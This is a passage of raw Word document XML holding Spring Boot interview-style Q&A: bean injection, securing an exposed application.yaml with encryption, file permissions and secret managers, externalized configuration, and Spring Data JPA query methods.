          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0953CEB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multiple beans of the same type are available, use @Qualifier to specify which one to inject.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2F1B4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a bean is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not found</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, it throws NoSuchBeanDefinitionException. Use @Autowired(required = false) to make it optional.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A95F0D8" w14:textId="053D42F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722" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26300B93" w14:textId="60EA02CF" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00395B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="672" w:name="_Toc197867886"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we handle a yaml file when it is exposed</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="672"/>
    </w:p>
    <w:p w14:paraId="4C87B0AE" w14:textId="63E6C0F9" w:rsidR="008B2A05" w:rsidRPr="002C6305" w:rsidRDefault="008B2A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handle an exposed application.yaml file securely in a Spring Boot application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C91F18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AC523">
          <v:rect id="_x0000_i2723" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA6E13"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Avoid Exposing It at All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8DC0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commit sensitive data (like DB passwords, tokens, keys) in version control (GitHub, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D4A79"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gitignore for environment-specific yaml files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EEF40D"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B98763">
          <v:rect id="_x0000_i2724" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1415666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e External Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1405279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ep application.yaml outside the packaged JAR/WAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBFCC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config.location during deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE52D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java -jar app.jar --spring.config.location=file:/opt/config/application.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AACBA13"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BB93C">
          <v:rect id="_x0000_i2725" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B5F0A"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Encrypt Sensitive Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529F17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Cloud Config or Jasypt encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520BB6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C2CE4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036FCA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ENC(encryptedValueHere)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C18BC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n decrypt via Jasypt starter or a decryption bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061D1AD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DE53A">
          <v:rect id="_x0000_i2726" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B0B76"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Secure Application Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48137C8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rict access to /resources/, /config/ folders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9DAF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vent static access to .yaml or .properties via Spring Boot’s WebSecurityConfigurerAdapter or equivalent filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A1947"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5F9EE9">
          <v:rect id="_x0000_i2727" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B589BE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Set File Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41629290"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only the deployment user has access to the yaml file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D727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mod 600 application.yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3CCBA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03D5F">
          <v:rect id="_x0000_i2728" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="635E3EF4"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Use Environment Variables Instead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A1FC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putting secrets in YAML—override using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67FB4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_DATASOURCE_PASSWORD=your-secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661F98A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F0822">
          <v:rect id="_x0000_i2729" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F170D"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st Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94414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plication.yaml only for </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-sensitiv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environment-agnostic configs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Store secrets in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049884A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ault (HashiCorp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A24CD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GCP Secret Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E9F6F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crypted Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB41AD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ed help encrypting YAML fields or setting up Jasypt?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6BFAF8" w14:textId="5F9D2DC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730" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="480D452A" w14:textId="650ABC69" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00BF257B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="673" w:name="_Toc197867887"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to externalize variables in spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="673"/>
    </w:p>
    <w:p w14:paraId="618CDA8B" w14:textId="08074ECD" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C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you can </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>externalize variables</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to separate configuration from code, making your app more flexible across environments. Here's how you can do it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A8F22A"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1C918">
          <v:rect id="_x0000_i2731" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F362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pplication.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ACA0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07915D8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBE48B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MySpringApp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F9005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ersion: 1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8F756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 in code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D97E229"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ue("${app.name}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CC0E65"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tring appName;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5107D1"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C8FFD">
          <v:rect id="_x0000_i2732" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5AF9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ing @ConfigurationProperties (recommended for grouping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D5B4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7DB40B4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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20D9F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i:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A569D4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 abc123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD0183"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imeout: 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548FF26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class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315438C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712394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Properties(prefix = "custom.api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D1C1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iConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9C2F8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key;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D8CB5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int timeout;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF0096" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="002C6305" w:rsidRDefault="007A17C9" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C644B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mp; setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11482D74"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19047B5B"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C908A">
          <v:rect id="_x0000_i2733" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFD1F1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Command-line arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189E5E5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erver.port=8082 --custom.api.key=xyz987</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E961729"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81B761">
          <v:rect id="_x0000_i2734" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F03346C"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Environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FED3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ERVER_PORT=9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FFC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CUSTOM_API_KEY=envKey123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8D74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maps these to properties (hyphen becomes dot, uppercase becomes lowercase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC83F6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4D563">
          <v:rect id="_x0000_i2735" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C35F0A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External application.yml/.properties file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5DBEA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ace it outside the JAR and use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33692A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6481CC7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5B05F0">
          <v:rect id="_x0000_i2736" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="628EC07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Profile-specific files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197A3BA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multiple files like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014FE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yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B44B0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yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AE8BD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ate with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083826C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6D3562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34214A3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7C28B5EE" w14:textId="77777777" w:rsidR="007A17C9" w:rsidRPr="00CE4B95"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737" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6164CA1B" w14:textId="4B0CCD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738" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="254AFF3F" w14:textId="64F613ED" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF445E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="674" w:name="_Toc197867888"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a novel based server</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="674"/>
    </w:p>
    <w:p w14:paraId="19BB5D4B" w14:textId="7644C88A" w:rsidR="002C4D65" w:rsidRPr="002C6305" w:rsidRDefault="002C4D6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Approach to Servers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If you meant a "novel" approach to server design, this could refer to a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>new or innovative method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for building or structuring a server, particularly one that diverges from traditional architectures. This could involve the use of newer technologies or frameworks, such as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serverless architectur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that offer new ways of designing and deploying servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7968C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Server in Gaming</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: In the context of gaming or online multiplayer games, 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could potentially refer to a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used in games that are inspired by or based on a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>novel's narrative</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or world-building. Some games or virtual worlds are directly inspired by novels, and a server used in such games could be described as "novel-based."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB669AC"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o or Miscommunication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It's also possible that you meant a different term like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"novelty serv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new server technology"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where "novel" might simply mean "new" or "innovative." In this case, it would be referring to servers that use new or unconventional technologies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4700C639"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asking about a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>specific type of server technolog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framework</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rchitecture</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> related to the word "novel," could you provide more context or clarify the term? I'd be happy to give you a more targeted answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5419C790" w14:textId="43F4B267"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739" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="035ED18E" w14:textId="101AAB79" w:rsidR="009653FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF445E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="675" w:name="_Toc197867889"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="675"/>
    </w:p>
    <w:p w14:paraId="4DD733BE" w14:textId="6F261D5D"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the methods findById, findByName, and similar methods are used to query the database based on the entity's properties. The magic behind these methods is that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method naming conventions to generate the query automatically. Here's a detailed breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E8DF42"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ndById():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C9BBA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indById is a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standard method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided by Spring Data JPA's JpaRepository interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01308C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used to find an entity by its primary key (ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8BB38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translates this method name into a query like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072A9B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ntity WHERE id = ?;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4CF5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ID column is typically the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>primary key</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the entity, and the findById method automatically knows to map the id field of the entity to the column in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F2B62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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F432B4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t;Employee&gt; employee = employeeRepository.findById(1L);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDFD0F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findByName():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B60073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imilarly, findByName is another query method wher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ranslates it into a query that retrieves records by the name field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01BC7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Spring Data JPA converts the method name into a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL (Java Persistence Query Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> query or an SQL query, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A737C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mployee WHERE name = ?;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4114C43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ssumes the name field exists in the entity and is mapped to the corresponding column in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B908F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998C2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employees = employeeRepository.findByName("John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546C22CA"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melCase in Method Names:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F86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when you use </w:t>
      </w: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n method names like findByEmployeeNam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nderstands it as a query method that translates into SELECT * FROM employee WHERE employee_name = ?.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E571A7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reflection to process the method names and dynamically generate queries at runtime based on method names, leveraging the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data Query Creation</w:t>
      </w:r>
